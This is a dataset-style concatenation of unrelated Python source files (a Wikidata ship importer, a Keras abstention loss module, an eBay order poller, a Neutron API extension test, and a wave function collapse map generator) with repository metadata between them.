                self.add_statement("manufacturer", varv, refs=[ref])
            else:
                self.add_to_report("varv", self.varv)

    def set_manufacture_year(self):
        """
        Set the manufacture year.
        If the column 'byggar' has a parsable value,
        use it as year of manufacture.
        Use WLM database as a source.
        """
        if self.has_non_empty_attribute("byggar"):
            byggar = utils.parse_year(
                utils.remove_characters(self.byggar, ".,"))
            if isinstance(byggar, int):
                ref = self.wlm_source
                self.add_statement(
                    "inception", utils.package_time({"year": byggar}),
                    refs=[ref])
            else:
                self.add_to_report("byggår", self.byggar)

    def set_dimensions(self):
        """
        Parse ship dimensions.
        They can look like this:
        'Längd: 15.77 Bredd: 5.19 Djup: 1.70 Brt: 15'
        If parsing fails, set it to an empty dictionary
        and save the input data to the problem report.
        Use WLM database as source.
        """
        if self.has_non_empty_attribute("dimensioner"):
            dimensions_processed = utils.parse_ship_dimensions(
                self.dimensioner)
            if not dimensions_processed:
                self.add_to_report("dimensioner", self.dimensioner)
            else:
                # Only add dimensions we have a property mapping for.
                for dimension, value in dimensions_processed.items():
                    if dimension in self.props:
                        ref = self.wlm_source
                        self.add_statement(
                            dimension,
                            utils.package_quantity(
                                value, self.common_items["metre"]),
                            refs=[ref])

    def set_homeport(self):
        """
        Add homeport to data object.
        Only works if column 'hemmahamn' contains exactly
        one wikilink.
        Use WLM database as source.
        """
        if self.has_non_empty_attribute("hemmahamn"):
            if utils.count_wikilinks(self.hemmahamn) == 1:
                home_port = utils.q_from_first_wikilink("sv", self.hemmahamn)
                ref = self.wlm_source
                self.add_statement("home_port", home_port, refs=[ref])

    def set_call_sign(self):
        """
        Add call sign to data object.
        [https://phabricator.wikimedia.org/T159427]
        A few of them are fake
        (since identifiers are needed in the WLM database).
        These have the shape wiki[0-9][0-9].
        Fake ID's are added as P2186 (WLM identifier).
        All values: https://phabricator.wikimedia.org/P5010
        Use WLM database as source.
        """
        if self.has_non_empty_attribute("signal"):
            ref = self.wlm_source
            if self.signal.startswith("wiki") or self.signal.startswith("Tidigare"):
                self.add_statement("wlm_id", self.signal, refs=[ref])
            else:
                self.add_statement("call_sign", self.signal, refs=[ref])

    def set_monuments_all_id(self):
        """Map which column name in specific table to ID in monuments_all."""
        self.monuments_all_id = self.signal

    def set_descriptions(self):
        """Set default descriptions."""
        desc_bases = {"sv": "kulturmärkt bruksfartyg",
                      "en": "listed historical ship in Sweden"}
        for language in ["en", "sv"]:
            self.add_description(language, desc_bases[language])

    def __init__(self, db_row_dict, mapping, data_files, existing):
        """Build the full data object for one database row.

        Runs the generic Monument setters followed by the ship-specific
        ones; order matters (e.g. set_type may overwrite the default P31
        set by set_is).
        """
        Monument.__init__(self, db_row_dict, mapping, data_files, existing)
        self.set_monuments_all_id()
        self.set_changed()
        self.wlm_source = self.create_wlm_source(self.monuments_all_id)
        self.set_country()
        self.set_is()
        self.set_heritage()
        self.set_source()
        self.set_registrant_url()
        self.set_labels("sv", self.namn)
        self.set_descriptions()
        self.set_image("bild")
        self.exists("sv", "artikel")
        self.set_type()
        self.set_commonscat()
        self.set_call_sign()
        self.set_manufacture_year()
        self.set_shipyard()
        self.set_homeport()
        self.set_dimensions()
        self.exists_with_prop(mapping)
if __name__ == "__main__":
"""Command line entry point for importer."""
args = importer.handle_args()
dataset = Dataset("se-ship", "sv", SeShipSv)
dataset.data_files = {
"functions": "se-ship_(sv)_functions.json"}
importer.main(args, dataset)
| 775 | 5,351 | 23 |
01f86b700d9d0b417557a171a1f8d779a003f6f4 | 6,278 | py | Python | Pilot1/NT3/abstain_functions.py | vgutta/Benchmarks | f739c1fb2b02dd8fb310e2182fa8c4baaaea7caf | [
"MIT"
] | 51 | 2017-01-24T20:57:27.000Z | 2022-02-15T00:33:45.000Z | Pilot1/NT3/abstain_functions.py | vgutta/Benchmarks | f739c1fb2b02dd8fb310e2182fa8c4baaaea7caf | [
"MIT"
] | 59 | 2017-08-21T22:19:44.000Z | 2021-11-01T16:05:35.000Z | Pilot1/NT3/abstain_functions.py | vgutta/Benchmarks | f739c1fb2b02dd8fb310e2182fa8c4baaaea7caf | [
"MIT"
] | 90 | 2016-11-22T03:57:07.000Z | 2022-01-11T04:43:23.000Z | from tensorflow.keras import backend as K
abs_definitions = [
{'name': 'add_class',
'nargs': '+',
'type': int,
'help': 'flag to add abstention (per task)'},
{'name': 'alpha',
'nargs': '+',
'type': float,
'help': 'abstention penalty coefficient (per task)'},
{'name': 'min_acc',
'nargs': '+',
'type': float,
'help': 'minimum accuracy required (per task)'},
{'name': 'max_abs',
'nargs': '+',
'type': float,
'help': 'maximum abstention fraction allowed (per task)'},
{'name': 'alpha_scale_factor',
'nargs': '+',
'type': float,
'help': 'scaling factor for modifying alpha (per task)'},
{'name': 'init_abs_epoch',
'action': 'store',
'type': int,
'help': 'number of epochs to skip before modifying alpha'},
{'name': 'n_iters',
'action': 'store',
'type': int,
'help': 'number of iterations to iterate alpha'},
{'name': 'acc_gain',
'type': float,
'default': 5.0,
'help': 'factor to weight accuracy when determining new alpha scale'},
{'name': 'abs_gain',
'type': float,
'default': 1.0,
'help': 'factor to weight abstention fraction when determining new alpha scale'},
{'name': 'task_list',
'nargs': '+',
'type': int,
'help': 'list of task indices to use'},
{'name': 'task_names',
'nargs': '+',
'type': int,
'help': 'list of names corresponding to each task to use'},
]
| 31.233831 | 124 | 0.58028 | from tensorflow.keras import backend as K
abs_definitions = [
{'name': 'add_class',
'nargs': '+',
'type': int,
'help': 'flag to add abstention (per task)'},
{'name': 'alpha',
'nargs': '+',
'type': float,
'help': 'abstention penalty coefficient (per task)'},
{'name': 'min_acc',
'nargs': '+',
'type': float,
'help': 'minimum accuracy required (per task)'},
{'name': 'max_abs',
'nargs': '+',
'type': float,
'help': 'maximum abstention fraction allowed (per task)'},
{'name': 'alpha_scale_factor',
'nargs': '+',
'type': float,
'help': 'scaling factor for modifying alpha (per task)'},
{'name': 'init_abs_epoch',
'action': 'store',
'type': int,
'help': 'number of epochs to skip before modifying alpha'},
{'name': 'n_iters',
'action': 'store',
'type': int,
'help': 'number of iterations to iterate alpha'},
{'name': 'acc_gain',
'type': float,
'default': 5.0,
'help': 'factor to weight accuracy when determining new alpha scale'},
{'name': 'abs_gain',
'type': float,
'default': 1.0,
'help': 'factor to weight abstention fraction when determining new alpha scale'},
{'name': 'task_list',
'nargs': '+',
'type': int,
'help': 'list of task indices to use'},
{'name': 'task_names',
'nargs': '+',
'type': int,
'help': 'list of names corresponding to each task to use'},
]
def adjust_alpha(gParameters, X_test, truths_test, labels_val, model, alpha, add_index):
    """Evaluate the abstaining model and rescale each task's abstention penalty.

    For every task index in ``gParameters['task_list']`` the per-task accuracy
    (over non-abstained samples) and abstention fraction are measured on
    ``X_test``, and ``alpha[k]`` is multiplied by a scale derived from how far
    those values miss the configured ``min_acc`` / ``max_abs`` targets. Tasks
    not in ``task_list`` get placeholder stats (accuracy 1.0, abstention 0.0).
    A CSV row of the resulting alphas/accuracies/abstention fractions is
    appended via ``write_abs_stats``.

    Returns:
        (ret, alpha): accumulated truth/prediction data and the (mutated in
        place) alpha variable.
    """
    task_names = gParameters['task_names']
    task_list = gParameters['task_list']
    avg_loss = 0.0
    ret = []
    ret_k = []
    # Abstaining-classifier targets and scaling configuration.
    max_abs = gParameters['max_abs']
    min_acc = gParameters['min_acc']
    alpha_scale_factor = gParameters['alpha_scale_factor']
    feature_test = X_test
    loss = model.evaluate(feature_test, labels_val)
    avg_loss = avg_loss + loss[0]
    pred = model.predict(feature_test)
    abs_gain = gParameters['abs_gain']
    acc_gain = gParameters['acc_gain']
    accs = []  # per-task accuracy over non-abstained predictions
    abst = []  # per-task abstention fraction
    for k in range(alpha.shape[0]):
        if k in task_list:
            truth_test = truths_test[:, k]
            alpha_k = K.eval(alpha[k])
            pred_classes = pred[k].argmax(axis=-1)
            true_classes = truth_test
            num_true = K.eval(K.sum(K.cast(K.equal(pred_classes, true_classes), 'int64')))
            num_false = K.eval(K.sum(K.cast(K.not_equal(pred_classes, true_classes), 'int64')))
            # The abstain class is the last output, at index add_index[k] - 1.
            num_abstain = K.eval(K.sum(K.cast(K.equal(pred_classes, add_index[k] - 1), 'int64')))
            print(num_true, num_false, num_abstain)
            total = num_false + num_true
            tot_pred = total - num_abstain
            abs_acc = 0.0
            # NOTE(review): divides by zero on an empty test set — confirm
            # callers guarantee total > 0.
            abs_frac = num_abstain / total
            if tot_pred > 0:
                abs_acc = num_true / tot_pred
            # Bound the multiplicative update to [scale_k, 1/scale_k] so a
            # single evaluation cannot swing alpha too far.
            scale_k = alpha_scale_factor[k]
            min_scale = scale_k
            max_scale = 1. / scale_k
            acc_error = min(abs_acc - min_acc[k], 0.0)   # only penalize missing the accuracy floor
            abs_error = max(abs_frac - max_abs[k], 0.0)  # only penalize exceeding the abstention cap
            new_scale = 1.0 + acc_gain * acc_error + abs_gain * abs_error
            new_scale = min(new_scale, max_scale)
            new_scale = max(new_scale, min_scale)
            print('Scaling factor: ', new_scale)
            K.set_value(alpha[k], new_scale * alpha_k)
            print_abs_stats(task_names[k], new_scale * alpha_k, num_true, num_false, num_abstain, max_abs[k])
            # NOTE(review): ret_k is a single list shared across iterations, so
            # ret ends up holding the same growing list once per task — confirm
            # this is the intended return structure.
            ret_k.append(truth_test)
            ret_k.append(pred)
            ret.append(ret_k)
            accs.append(abs_acc)
            abst.append(abs_frac)
        else:
            accs.append(1.0)
            # BUG FIX: this was accs.append(0.0), which left abst one entry
            # short per skipped task (IndexError in write_abs_stats) while
            # padding accs with a bogus extra value.
            abst.append(0.0)
    write_abs_stats(gParameters['output_dir'] + 'abs_stats.csv', alpha, accs, abst)
    return ret, alpha
def loss_param(alpha, mask):
    """Build an abstention-aware sparse categorical cross-entropy loss.

    Args:
        alpha: penalty coefficient applied to the abstention term.
        mask: one-hot style mask selecting the abstain output unit(s).

    Returns:
        A Keras-compatible loss function ``loss(y_true, y_pred)``.
    """
    def loss(y_true, y_pred):
        # Cross-entropy computed over the real (non-abstain) class outputs.
        real_class_pred = (1 - mask) * y_pred
        ce = K.sparse_categorical_crossentropy(y_true, real_class_pred)
        # Probability mass assigned to the abstain output, clipped away from
        # 0 and 1 so the log term below stays finite.
        p_abstain = K.clip(K.mean(mask * y_pred, axis=-1), K.epsilon(), 1. - K.epsilon())
        # Down-weight the data loss by how much was abstained, and charge
        # alpha * -log(1 - p_abstain) for abstaining.
        return (1. - p_abstain) * ce - alpha * K.log(1. - p_abstain)
    return loss
def print_abs_stats(task_name, alpha, num_true, num_false, num_abstain, max_abs):
    """Print one formatted header + data row of abstention statistics for a task."""
    # Derived quantities: total predictions, predictions actually committed to
    # a class, fraction abstained, and accuracy over committed predictions.
    total = num_true + num_false
    tot_pred = total - num_abstain
    abs_frac = num_abstain / total
    abs_acc = num_true / tot_pred if tot_pred > 0 else 1.0
    print('    task, alpha, true, false, abstain, total, tot_pred, abs_frac, max_abs, abs_acc')
    print('{:>12s}, {:10.5e}, {:8d}, {:8d}, {:8d}, {:8d}, {:8d}, {:10.5f}, {:10.5f}, {:10.5f}'
          .format(task_name, alpha,
                  num_true, num_false - num_abstain, num_abstain, total,
                  tot_pred, abs_frac, max_abs, abs_acc))
def write_abs_stats(stats_file, alphas, accs, abst):
    """Append one CSV row of alpha values, accuracies and abstention fractions.

    Args:
        stats_file: path of the CSV file to append to.
        alphas: Keras variable tensor of per-task alphas.
        accs: per-task accuracy list (same length as alphas).
        abst: per-task abstention-fraction list (same length as alphas).
    """
    # FIX: use a context manager — the original opened the file and never
    # closed it, leaking the handle (and risking unflushed data).
    with open(stats_file, 'a') as abs_file:
        for k in range(alphas.shape[0]):
            abs_file.write("%10.5e," % K.get_value(alphas[k]))
        for k in range(alphas.shape[0]):
            abs_file.write("%10.5e," % accs[k])
        for k in range(alphas.shape[0]):
            abs_file.write("%10.5e," % abst[k])
        abs_file.write("\n")
| 4,711 | 0 | 92 |
d7750cf5323d1a15939ac85d0efa1a3173c40f8c | 3,877 | py | Python | python/lib/python2.7/site-packages/ebaysdk-2.1.4-py2.7.egg/ebaysdk/poller/orders.py | gtfarng/Odoo_migrade | 9cc28fae4c379e407645248a29d22139925eafe7 | [
"Apache-2.0"
] | 1 | 2019-12-19T01:53:13.000Z | 2019-12-19T01:53:13.000Z | python/lib/python2.7/site-packages/ebaysdk-2.1.4-py2.7.egg/ebaysdk/poller/orders.py | gtfarng/Odoo_migrade | 9cc28fae4c379e407645248a29d22139925eafe7 | [
"Apache-2.0"
] | null | null | null | python/lib/python2.7/site-packages/ebaysdk-2.1.4-py2.7.egg/ebaysdk/poller/orders.py | gtfarng/Odoo_migrade | 9cc28fae4c379e407645248a29d22139925eafe7 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
'''
Authored by: Tim Keefer
Licensed under CDDL 1.0
'''
from datetime import datetime, timedelta
from ebaysdk.trading import Connection as Trading
from ebaysdk.poller import parse_args, file_lock
from ebaysdk import log
# Script entry point: parse CLI options and run the order poller with the
# default log-based Storage backend.
if __name__ == '__main__':
    (opts, args) = parse_args("usage: python -m ebaysdk.poller.orders [options]")
    poller = Poller(opts, Storage())
    poller.run()
| 38.386139 | 176 | 0.573381 | # -*- coding: utf-8 -*-
'''
Authored by: Tim Keefer
Licensed under CDDL 1.0
'''
from datetime import datetime, timedelta
from ebaysdk.trading import Connection as Trading
from ebaysdk.poller import parse_args, file_lock
from ebaysdk import log
class Storage(object):
    """Default storage backend: logs a one-line summary of each polled order."""

    def set(self, order):
        """Flatten *order* into key=value pairs and emit them via log.debug."""
        first_txn = order.TransactionArray.Transaction[0]
        fields = [
            ("ID", order.OrderID),
            ("Status", order.OrderStatus),
            ("Seller Email", order.SellerEmail),
            ("Title", first_txn.Item.Title),
            ("ItemID", first_txn.Item.ItemID),
            ("QTY", first_txn.QuantityPurchased),
            ("Payment Method", order.CheckoutStatus.PaymentMethod),
            ("Payment Date", getattr(order, 'PaidTime', 'Not Paid')),
            ("Total", (order.Total._currencyID + ' ' + order.Total.value)),
        ]

        # SKU only exists on orders for item variations.
        if first_txn.get('Variation', None):
            fields.append(("SKU", first_txn.Variation.SKU))

        fields.append(("Shipped Time", getattr(order, 'ShippedTime', 'Not Shipped')))
        fields.append(("Shipping Service", getattr(order, 'ShippingServiceSelected', 'N/A')))

        # Tracking details are only present once a shipment exists.
        shipping = order.ShippingDetails
        if shipping.get('ShipmentTrackingDetails', None):
            options = shipping.ShippingServiceOptions
            tracking = shipping.ShipmentTrackingDetails
            fields.extend([
                ("Min Shipping Days", options.ShippingTimeMin),
                ("Max Shipping Days", options.ShippingTimeMax),
                ("Tracking", tracking.ShipmentTrackingNumber),
                ("Carrier", tracking.ShippingCarrierUsed),
                ("Cost", (options.ShippingServiceCost._currencyID, options.ShippingServiceCost.value)),
            ])

        log.debug(", ".join("%s=%s" % (key, value) for key, value in fields))
class Poller(object):
    """Polls eBay's Trading API for recently modified orders and hands each
    one to a storage backend (anything with a ``set(order)`` method)."""

    def __init__(self, opts, storage=None):
        self.opts = opts
        self.storage = storage

    def run(self):
        """Fetch orders modified inside the configured time window and store each."""
        # The lock file keeps concurrent poller runs from overlapping.
        with file_lock("/tmp/.ebaysdk-poller-orders.lock"):
            log.debug("Started poller %s" % __file__)

            window_end = datetime.utcnow()
            window_start = window_end - timedelta(hours=self.opts.hours,
                                                  minutes=self.opts.minutes)

            api = Trading(debug=self.opts.debug, config_file=self.opts.yaml,
                          appid=self.opts.appid, certid=self.opts.certid,
                          devid=self.opts.devid, siteid=self.opts.siteid,
                          warnings=False)

            api.build_request('GetOrders', {
                'DetailLevel': 'ReturnAll',
                'OrderRole': self.opts.OrderRole,
                'OrderStatus': self.opts.OrderStatus,
                'Pagination': {
                    'EntriesPerPage': 25,
                    'PageNumber': 1,
                },
                'ModTimeFrom': window_start.strftime('%Y-%m-%dT%H:%M:%S.000Z'),
                'ModTimeTo': window_end.strftime('%Y-%m-%dT%H:%M:%S.000Z'),
            }, None)

            for resp in api.pages():
                if not resp.reply.OrderArray:
                    log.debug("no orders to process")
                    continue
                for order in resp.reply.OrderArray.Order:
                    if self.storage:
                        self.storage.set(order)
                    else:
                        log.debug("storage object not defined")
# Script entry point: parse CLI options and run the order poller with the
# default log-based Storage backend.
if __name__ == '__main__':
    (opts, args) = parse_args("usage: python -m ebaysdk.poller.orders [options]")
    poller = Poller(opts, Storage())
    poller.run()
5b7fe67855788977661c9f99621d3e73aa41bc60 | 2,235 | py | Python | neutron_tempest_plugin/api/test_extensions.py | cloudification-io/neutron-tempest-plugin | 753ddfe205746c1cdbf94c5232096febbbf2ed22 | [
"Apache-2.0"
] | 13 | 2017-10-31T10:38:05.000Z | 2022-02-04T13:59:20.000Z | neutron_tempest_plugin/api/test_extensions.py | cloudification-io/neutron-tempest-plugin | 753ddfe205746c1cdbf94c5232096febbbf2ed22 | [
"Apache-2.0"
] | null | null | null | neutron_tempest_plugin/api/test_extensions.py | cloudification-io/neutron-tempest-plugin | 753ddfe205746c1cdbf94c5232096febbbf2ed22 | [
"Apache-2.0"
] | 8 | 2018-10-12T19:48:33.000Z | 2022-02-25T20:38:41.000Z | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.common import utils
from tempest import config
from tempest.lib import decorators
from neutron_tempest_plugin.api import base
CONF = config.CONF
| 39.210526 | 79 | 0.719016 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.common import utils
from tempest import config
from tempest.lib import decorators
from neutron_tempest_plugin.api import base
CONF = config.CONF
class ExtensionsTest(base.BaseNetworkTest):
    """Checks the server's extension list against the tempest configuration."""

    def _test_list_extensions_includes(self, exts):
        """Assert each alias in *exts* is listed iff it is enabled in config."""
        resp = self.client.list_extensions()
        listed = {extension['alias'] for extension in resp['extensions']}
        self.assertNotEmpty(listed, "Extension list returned is empty")
        for alias in exts:
            if utils.is_extension_enabled(alias, "network"):
                self.assertIn(alias, listed)
            else:
                self.assertNotIn(alias, listed)

    @decorators.idempotent_id('262420b7-a4bb-4a3e-b4b5-e73bad18df8c')
    def test_list_extensions_sorting(self):
        self._test_list_extensions_includes(['sorting'])

    @decorators.idempotent_id('19db409e-a23f-445d-8bc8-ca3d64c84706')
    def test_list_extensions_pagination(self):
        self._test_list_extensions_includes(['pagination'])

    @decorators.idempotent_id('155b7bc2-e358-4dd8-bf3e-1774c084567f')
    def test_list_extensions_project_id(self):
        self._test_list_extensions_includes(['project-id'])

    @decorators.idempotent_id('c7597fac-2404-45b1-beb4-523c8b1d4604')
    def test_list_extensions_includes_all(self):
        configured = CONF.network_feature_enabled.api_extensions
        if not configured:
            raise self.skipException("Extension list is empty")
        if configured[0] == 'all':
            raise self.skipException("No lists of enabled extensions provided")
        self._test_list_extensions_includes(configured)
| 1,040 | 437 | 23 |
4b1e40615b87434b831c55952aad6964d3eadfad | 21,589 | py | Python | wfc.py | Sunnigen/pywave-function-collapse | cc8c9c23db100f27acc3c3247aa2993f596a818d | [
"MIT"
] | 2 | 2022-03-24T15:05:27.000Z | 2022-03-29T03:06:45.000Z | wfc.py | Sunnigen/pywave-function-collapse | cc8c9c23db100f27acc3c3247aa2993f596a818d | [
"MIT"
] | null | null | null | wfc.py | Sunnigen/pywave-function-collapse | cc8c9c23db100f27acc3c3247aa2993f596a818d | [
"MIT"
] | null | null | null | from collections import Counter, deque
from random import choice, randint, shuffle
from typing import Dict, Iterable, List, Tuple
import numpy as np
from utils import helper_functions
import pathfinding
import cProfile
import functools
import pstats
import tempfile
| 44.421811 | 157 | 0.573811 | from collections import Counter, deque
from random import choice, randint, shuffle
from typing import Dict, Iterable, List, Tuple
import numpy as np
from utils import helper_functions
import pathfinding
import cProfile
import functools
import pstats
import tempfile
def profile_me(func):
    """Decorator: profile each call to *func* and print the hottest entries.

    The wrapped function's return value is passed through (the original
    wrapper discarded it and always returned None). Stats are dumped to a
    temporary file, printed sorted by internal time, then the file is removed.
    """
    @functools.wraps(func)
    def wraps(*args, **kwargs):
        import os  # local import keeps the decorator self-contained

        # FIX: mkstemp instead of the deprecated/insecure tempfile.mktemp.
        fd, stats_path = tempfile.mkstemp()
        os.close(fd)
        profiler = cProfile.Profile()
        # FIX: capture and return the wrapped call's result.
        result = profiler.runcall(func, *args, **kwargs)
        profiler.dump_stats(stats_path)
        pstats.Stats(stats_path).strip_dirs().sort_stats('time').print_stats(100)
        os.remove(stats_path)  # FIX: don't leak the temp file
        return result
    return wraps
class WaveFunctionCollapse:
    """Tile-map generator based on the Wave Function Collapse algorithm.

    For every grid cell the generator keeps the set of tiles that could still
    legally be placed there ("probabilities"). It repeatedly collapses the
    cell with the fewest remaining options (lowest entropy) and propagates
    the constraints of each placed tile to nearby cells via a BFS
    "probability sphere".
    """
    x_max: int = 0  # grid width in tiles
    y_max: int = 0  # grid height in tiles
    tile_range: int = 0  # BFS radius that constraint propagation reaches
    undecided_tiles: Iterable = None  # coordinates not yet collapsed
    impossible_tiles: Iterable = None  # coordinates found with no legal tile
    matching_tile_data: Dict = None  # dictionary of tile numbers and their matching tiles respective to each side
    base_probability: Dict = None  # dict containing tile numbers as keys and connected probabilities per each direction
    tile_array: List[List[int]] = None  # 2D matrix containing tile numbers stored as int
    tiles_array_probabilities: np.ndarray = None  # 2D Numpy Matrix of dicts of every possible tile per coordinate
    lowest_entropy: Tuple[Tuple[int, int], int] = [(999, 999), 999]  # coordinate point with lowest tile probability
    probability_coordinate_list: Dict = None  # test to find highest entropy, {val:key}

    # Generation counters (diagnostics only).
    attempts: int = 0
    tile_chosen_randomly: int = 0
    probability_reset: int = 0

    # Pathfinding grid used for the BFS probability sphere.
    field: pathfinding.GridWithWeights = None

    def __init__(self, gui, width: int, height: int) -> None:
        self.x_max = width
        self.y_max = height
        self.gui = gui
        # Subtract .1 so we can at least retain some probability data at max tile range
        self.tile_range = 10
        self.tile_range += 0.1
        self.undecided_tiles = deque()
        self.matching_tile_data = {}
        self.base_probability = {}
        self.last_tile_changed = (0, 0)
        self.reset_generation_data()

    def reset_generation_data(self):
        """Reset the map, probability grid, counters and undecided-tile queue."""
        self.field = pathfinding.GridWithWeights(self.x_max, self.y_max)
        self.tile_array = [[0 for y in range(self.y_max)] for x in range(self.x_max)]  # tile names
        self.tiles_array_probabilities = np.array(
            [[{} for y in range(self.y_max)] for x in range(self.x_max)])  # tile probabilities
        self.undecided_tiles = deque([(x, y) for y in range(self.y_max) for x in range(self.x_max)])
        self.impossible_tiles = []
        # Randomize visit order of undecided cells.
        shuffle(self.undecided_tiles)
        self.attempts = 0
        self.tile_chosen_randomly = 0
        self.probability_reset = 0

    def find_lowest_entropy(self):
        """Find and store the coordinate with the fewest remaining tile options.

        First scans the undecided-tile queue and returns as soon as a cell
        beats the currently stored entropy; otherwise falls back to a full
        grid scan.
        """
        for x, y in self.undecided_tiles:
            if self.tiles_array_probabilities[x][y]:
                entropy_score = len(self.tiles_array_probabilities[x][y])
                if entropy_score < self.lowest_entropy[1]:
                    self.lowest_entropy = [(x, y), entropy_score]

                    # Update the on-screen stats label if the GUI exposes one.
                    if self.gui.lbl_stats:
                        self.gui.lbl_stats.text = 'Lowest Entropy|(%s, %s): %s' % (self.lowest_entropy[0][0],
                                                                                   self.lowest_entropy[0][1],
                                                                                   self.lowest_entropy[1])
                    return

        # Fallback: loop through all tiles and find the lowest entropy.
        # BUG FIX: coord_score was never initialized before this loop, which
        # raised NameError whenever this path executed.
        coord_score = [(999, 999), 999]
        for y in range(self.y_max):
            for x in range(self.x_max):
                if self.tiles_array_probabilities[x][y]:
                    possibility_count = len(self.tiles_array_probabilities[x][y])
                    if possibility_count < coord_score[1]:
                        coord_score = [(x, y), possibility_count]

        # Adopt the scanned result only if it beats the current selection.
        if coord_score[1] < self.lowest_entropy[1]:
            self.lowest_entropy = coord_score
            if self.gui.lbl_stats:
                self.gui.lbl_stats.text = 'Lowest Entropy|(%s, %s): %s' % (self.lowest_entropy[0][0],
                                                                           self.lowest_entropy[0][1],
                                                                           self.lowest_entropy[1])

    def force_weighted_placement(self):
        """Force placement of a random tile at a random cell.

        Needed when no tiles have been collapsed yet, to seed generation.
        """
        x = (randint(0, self.x_max - 1))
        y = (randint(0, self.y_max - 1))
        self.lowest_entropy = [(x, y), 999]
        new_tile = randint(1, len(self.gui.tiles) - 1)
        self.tile_array[x][y] = new_tile
        # Placed tiles become BFS obstacles for the probability sphere.
        self.field.walls.append((x, y))
        if (x, y) in self.undecided_tiles:
            self.undecided_tiles.remove((x, y))
        self.reset_entropy()
        self.probability_sphere(x, y, new_tile)
        self.gui.place_tile(x, y)
        if self.lowest_entropy[1] == 999:
            self.find_lowest_entropy()
        self.tiles_array_probabilities[x][y] = {}

    def weighted_placement(self, dt=0):
        """Collapse one cell per call (suitable as a GUI clock callback).

        Args:
            dt: elapsed time supplied by the GUI scheduler; unused.
        """
        # 1. Stop when every tile has been decided.
        if not self.undecided_tiles:
            self.gui.generate_iter = 0
            return

        # 2. Select the cell with the lowest entropy, or pop an arbitrary
        #    undecided cell when no entropy has been recorded yet.
        if self.lowest_entropy[1] == 999:
            x, y = self.undecided_tiles.pop()
        else:
            x, y = self.lowest_entropy[0]

        # 3. Remove the chosen cell from the undecided queue.
        if (x, y) in self.undecided_tiles:
            self.undecided_tiles.remove((x, y))

        # 4. Pick a tile from the cell's remaining possibilities.
        new_tile = self.new_tile_based_on_surrounding_tiles(x, y)

        # 5. Place the tile and propagate constraints, or fall back to a
        #    forced random seed placement once.
        self.reset_entropy()
        if new_tile:
            self.tile_array[x][y] = new_tile
            self.field.walls.append((x, y))
            self.probability_sphere(x, y, new_tile)
            self.gui.place_tile(x, y)
        else:
            if self.tile_chosen_randomly > 0:
                print("UH OH RANDOM PLACEMENT MORE THAN ONCE!!!")
            else:
                self.force_weighted_placement()
            self.tile_chosen_randomly += 1

        # 6. Refresh the lowest-entropy selection and clear this cell's
        #    (now meaningless) probability set.
        if self.lowest_entropy[1] == 999:
            self.find_lowest_entropy()
        self.tiles_array_probabilities[x][y] = {}

        # Update the generation counter.
        self.gui.generate_iter -= 1

    def probability_sphere(self, x, y, new_tile):
        """Propagate *new_tile*'s constraints to cells within tile_range.

        Updates a "sphere" (diamond of tile_range size, via BFS) around the
        newly placed tile, recording the lowest-entropy candidate found.
        """
        # BFS outward from the placed tile to get an ordered list of
        # uncollapsed coordinates to update.
        start = (x, y)
        came_from, cost_so_far, coordinates_travelled = \
            pathfinding.breadth_first_search_with_probability(self.field, start, self.tile_range)

        # The origin already holds a decided tile; skip it.
        if start in coordinates_travelled:
            coordinates_travelled.remove(start)

        for coordinate in coordinates_travelled:
            i, j = coordinate
            probability_list, final_tile_type = self.obtain_probabilities_list(new_tile, i, j, x, y,
                                                                               coordinates_travelled.index(coordinate))
            if probability_list:
                self.tiles_array_probabilities[i][j] = probability_list

                # Track the best candidate for the next collapse.
                entropy_score = len(probability_list)
                if entropy_score <= self.lowest_entropy[1]:
                    self.lowest_entropy = [(i, j), entropy_score]
                    if self.gui.lbl_stats:
                        self.gui.lbl_stats.text = 'Lowest Entropy|(%s, %s): %s' % (i, j, self.lowest_entropy[1])
            else:
                # No probability found: contradiction discovered at (i, j).
                print("\n### Impossible Tile Found at (%s, %s)###" % (i, j))

    def obtain_probabilities_list(self, new_tile, i, j, x, y, iteration):
        """Build the possibility set for cell (i, j) from its four neighbors.

        Neighbor contributions come in two flavors: 'adjacent' (a decided
        tile) and 'probability' (an undecided neighbor's own possibility
        set); adjacent contributions take precedence. *iteration* is the BFS
        visit index (currently informational only).

        Returns:
            (probability_list, tile_type) where tile_type is 'adjacent',
            'probability' or '' when nothing constrains the cell.
        """
        probability_tile_list = []
        adjacent_tile_list = []
        probability_list = []
        final_tile_type = ''
        direction_list = [(i + 0, j + 1, 'north'),
                          (i + 1, j + 0, 'east'),
                          (i + 0, j + (-1), 'south'),
                          (i + (-1), j + 0, 'west')]
        shuffle(direction_list)
        for _ in range(4):
            px, py, direction = direction_list.pop()
            if self.check_coordinate_within_map(px, py):
                ind, op_ind = helper_functions.find_opposite(direction)
                tiles_list, tile_type = self.modify_probability(new_tile, op_ind, i, j, x, y, px, py)
                if tile_type == 'adjacent':
                    adjacent_tile_list.append(tiles_list)
                elif tile_type == 'probability':
                    adjacent_tile_list.append(tiles_list)
                    probability_tile_list.append(tiles_list)

        if adjacent_tile_list:
            # Keep only tiles compatible with every neighboring constraint,
            # intersected with any possibilities already stored for (i, j).
            if len(self.tiles_array_probabilities[i][j]) > 0:
                adjacent_tile_list.append(self.tiles_array_probabilities[i][j])
            probability_list = helper_functions.dict_intersect(adjacent_tile_list)
            final_tile_type = 'adjacent'
        elif probability_tile_list:
            if len(self.tiles_array_probabilities[i][j]) > 0:
                probability_tile_list.append(self.tiles_array_probabilities[i][j])
            probability_list = helper_functions.dict_intersect(probability_tile_list)
            final_tile_type = 'probability'

        return probability_list, final_tile_type

    def new_tile_based_on_surrounding_tiles(self, x, y):
        """Return a tile for (x, y) drawn from its remaining possibilities, or None."""
        # Nothing to choose from: the cell has no recorded possibilities.
        if len(self.tiles_array_probabilities[x][y]) < 1:
            return None
